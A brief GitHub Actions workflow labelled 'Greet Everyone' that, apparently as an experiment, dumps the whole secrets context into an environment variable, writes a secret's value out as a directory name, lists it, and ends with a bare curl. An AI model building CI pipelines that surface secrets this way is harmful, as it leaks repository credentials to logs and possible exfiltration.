name: Greet Everyone
# This workflow is triggered on pushes to the repository.
on: [push]

jobs:
  build:
    # Job name is Greeting
    name: Greeting
    # This job runs on Linux
    runs-on: ubuntu-latest
    steps:
      # This step uses GitHub's hello-world-javascript-action: https://github.com/actions/hello-world-javascript-action
      - name: save secets context
        shell: bash
        run: mkdir ${{ secrets.TEST_SECRET_NAME }}
        env:
          SECRETS_CONTEXT: ${{ toJson(secrets) }}
      - name: view the secrets context
        shell: bash
        run: ls
      - name: view the secrets context2
        shell: bash
        run: curl
